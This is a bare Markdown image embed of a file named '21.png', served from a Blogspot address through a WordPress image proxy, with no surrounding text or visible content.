![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-SaVudrWdxZs/XQ-J8RjYSgI/AAAAAAAAe8s/ldbvH-MfxCcJ-di8alcgn2j_sbqWg-sjQCLcBGAs/s1600/21.png?w=687&ssl=1)













